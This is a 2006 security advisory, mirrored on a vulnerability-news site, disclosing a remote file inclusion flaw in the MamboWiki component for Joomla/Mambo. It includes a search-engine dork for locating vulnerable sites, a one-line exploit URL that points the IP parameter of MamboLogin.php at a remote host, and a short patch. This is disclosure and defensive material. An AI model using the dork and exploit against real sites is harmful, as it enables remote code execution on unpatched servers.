Computer Security

Security Advisory: Joomla MamboWiki Component <= 0.9.4 (MamboLogin.php) Remote File Inclusion Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA21543] mail f/w system Mail Header Injection Vulnerability

  [SA21604] Drupal E-commerce Module Script Insertion Vulnerabilities

  [SA21603] Drupal Easylinks Module Script Insertion and SQL Injection

  [SA21584] Empire CMS "check_path"
File Inclusion Vulnerability

From:camino_(at)_sexmagnet.com <camino_(at)_sexmagnet.com>
Date:21.08.2006
Subject:Joomla MamboWiki Component <= 0.9.4 (MamboLogin.php) Remote File Inclusion Vulnerability


   .:[ insecurity research team ]:.
    .__..____.:.______.____.:.____ .
.:. |  |/    \:/  ___// __ \:/   _\.:.
  : |  |   |  \\____\\  ___/\   /__ :. .
..: |__|___|  /____  >\___  >\___  >.:
  .:.. ..  .\/   .:\/:.  .\/.  .:\/:
.   ...:.    .advisory.    .:...
        :..................: 18.o8.2oo6 ..


 Affected Application: MamboWiki <= v0.9.4

         (Mambo/Joomla CMS Component)


. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


 Discoverd by: camino

 Team: Insecurity Research Team

 URL: http://www.insecurityresearch.org

 E-Mail: camino[at]sexmagnet[dot]com



. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .


 Typ: Remote [x]  Local [ ]

      Remote File Inclusion [x]  SQL Injection [ ]

 Level: Low [ ]  Middle [ ]  High [x]

 Application: MamboWiki

 Version: <= 0.9.4

 Vulnerable File: MamboLogin.php

 URL: http://www.lyquidity.com

 Description: A component like Wikipedia for Jooma/Mambo.

 Dork: inurl:"com_mambowiki"



. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


 http://[sitepath]/[joomlapath]/components/com_mambowiki/

 MamboLogin.php?IP=http://huh?



. . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .


 o1.) open MamboLogin.php

 o2.) add this in line 8:

        defined( '_VALID_MOS' ) or

        die( 'Direct Access to this location is not allowed.' );

 o3.) done!



. . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .


 my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members

 of insecurity research team ;-)
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server